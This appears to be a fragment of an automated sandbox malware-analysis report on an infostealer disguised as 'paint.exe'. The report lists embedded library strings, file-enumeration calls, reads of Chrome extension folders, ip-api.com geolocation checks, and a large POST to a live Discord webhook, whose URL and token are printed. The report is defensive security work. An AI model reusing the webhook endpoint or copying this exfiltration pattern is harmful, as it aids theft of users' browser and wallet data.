sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: paint.exe, 00000001.00000002.2013861786.00007FFDFAED2000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: paint.exe, 00000001.00000002.2020696017.00007FFE1A464000.00000002.00000001.01000000.00000006.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667295052.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668542158.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.pdb source: powershell.exe, 0000002F.00000002.1831220495.000001B38AF36000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667196677.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668000364.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: paint.exe, 00000001.00000002.2017457879.00007FFE11511000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: api-ms-win-core-file-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1668691836.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669826746.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669030963.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: paint.exe, 00000001.00000002.2019931710.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1666671701.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: paint.exe, 00000001.00000002.2017036529.00007FFE01431000.00000002.00000001.01000000.00000004.sdmp, ucrtbase.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: paint.exe, 00000001.00000002.2017803927.00007FFE11EA1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669986148.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669231918.0000023393147000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: paint.exe, 00000001.00000002.2013426793.00007FFDFAB0F000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: paint.exe, 00000001.00000002.2016607190.00007FFE007E5000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: paint.exe, 00000000.00000003.1667071030.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1668215242.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: paint.exe, 00000000.00000003.1666481364.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: paint.exe, 00000000.00000003.1669696117.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: paint.exe, paint.exe, 00000001.00000002.2013861786.00007FFDFAF6A000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667397043.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000058.00000002.1935649794.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp, rar.exe, 00000058.00000000.1922631309.00007FF623E40000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669612064.0000023393149000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: paint.exe, 00000000.00000003.1670514489.0000023393149000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668921713.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: paint.exe, 00000000.00000003.1668427752.0000023393148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: paint.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: paint.exe, 00000001.00000002.2018668375.00007FFE126EB000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: paint.exe, 00000000.00000003.1667479832.0000023393141000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: paint.exe, 00000001.00000002.2019092977.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1667816772.0000023393141000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669915105.0000023393142000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: paint.exe, 00000000.00000003.1668113578.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: paint.exe, 00000001.00000002.2018365437.00007FFE11EC1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: paint.exe, 00000000.00000003.1669134321.0000023393148000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr

Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,	0_2_00007FF6F0BD92F0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6F0BD83B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 0_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6F0BF18E4
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD92F0 FindFirstFileExW,FindClose,	1_2_00007FF6F0BD92F0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BD83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6F0BD83B0
Source: C:\Users\user\Desktop\paint.exe	Code function: 1_2_00007FF6F0BF18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6F0BF18E4
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	88_2_00007FF623DF46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623DEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	88_2_00007FF623DEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe	Code function: 88_2_00007FF623E388E0 FindFirstFileExA,	88_2_00007FF623E388E0

Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\paint.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 162.159.137.232 162.159.137.232

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: paint.exe, 00000001.00000002.2012300197.0000020772C20000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: discord.com

Source: unknown

HTTP traffic detected: POST /api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 728360User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=5504fd0b02b225da5837704d2ec650da

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 05 Jan 2025 09:16:37 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1736068599x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TD8%2FG%2Boni%2BnWwIq8RmUSuAHrutMTwdF2QH58uv%2BCizcFnzmM5qaI1%2BrUWuEisXltQ5GQ6yAgFnPCohw6oWmBtNJO%2BAGl5o8QX8vxChfza9%2FfuxfjkpWiZyakFHdx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=b23ede6a2683bc41436838bfd0b40396a9211394-1736068597; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=WzXRjZZPUtRwjwHI2vQUBHc9MsDw.9t6IlQXS7UdZ5g-1736068597806-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8fd25edcdfaa42db-EWR

Source: paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: paint.exe, 00000001.00000003.2005215252.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781102686.00000207714D3000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1919791436.00000207714D8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1712152844.00000207714D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: libcrypto-3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: paint.exe, 00000001.00000003.1680037810.00000207713E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: paint.exe, 00000001.00000002.2008610347.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711380871.0000020771500000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1771294068.00000207714FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: paint.exe, 00000001.00000003.1785051824.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771906000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696498061.0000020771927000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: paint.exe, 00000001.00000003.2006772338.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1711530938.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1785051824.000002077185F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1781796667.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1920856863.0000020771864000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696746336.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2009946233.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1734071594.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1725063677.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.1696827300.0000020771892000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000003.2004727333.0000020771BE8000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000001.00000002.2008958155.00000207718A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: paint.exe, 00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 0000000C.00000002.1893410367.0000019D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AC2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1886205095.000001B39AD6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38C51B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671769217.000002339314F000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: paint.exe, 00000000.00000003.1671769217.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671364372.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1671896569.0000023393142000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr, libcrypto-3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000002F.00000002.1831220495.000001B38ADDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.1831220495.000001B38ABB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.1831665258.0000019D80228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: paint.exe, 00000001.00000002.2011815556.000002077262C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp, paint.exe, 00000000.00000003.1673285600.000002339314F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: paint.exe, 00000000.00000003.1673052282.0000023393142000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
